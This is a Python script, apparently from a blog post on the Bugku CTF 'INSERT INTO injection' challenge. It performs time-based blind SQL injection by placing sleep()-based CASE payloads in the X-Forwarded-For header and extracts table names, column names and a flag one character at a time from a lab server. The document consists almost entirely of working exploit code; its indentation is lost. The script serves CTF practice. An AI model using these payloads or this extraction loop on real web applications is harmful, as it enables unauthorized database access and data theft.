# -*-coding:utf-8-*-
# author : wen
# flag:wen{b7bb30b3435f2e7c418b131f9e789f81}
import requests
import time
url = 'http://123.206.87.240:8002/web15/'
payload = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.{}'
data = ''
for i in range(1,40):
for p in range(32,126):
starttime = time.time()
#XFF = u"1'and (select case when (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database())from %d for 1)) = %d) then sleep(4) else 1 end) and '1'='1" %(i,p)
#XFF = u"1'and (select case when (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'flag')from %d for 1)) = %d) then sleep(4) else 1 end) and '1'='1" %(i,p)
XFF = u"1'and (select case when (ascii(substr((select flag from flag)from %d for 1)) = %d) then sleep(4) else 1 end) and '1'='1" %(i,p)
#127.0.0.1'+(select case when substr((select flag from flag) from 1 for 1)='a' then sleep(5) else 0 end))
#print XFF
headers = {'X-Forwarded-For':XFF}
html = requests.get(url,headers=headers)
if time.time() - starttime > 3:
data += chr(p)
print "i===="+str(i)+"\n p==="+str(p)
print data
print "=================================>"
print "F L A G\n" + data
bugku-INSERT INTO注入(附代码) 详细
最新推荐文章于 2024-07-03 07:00:00 发布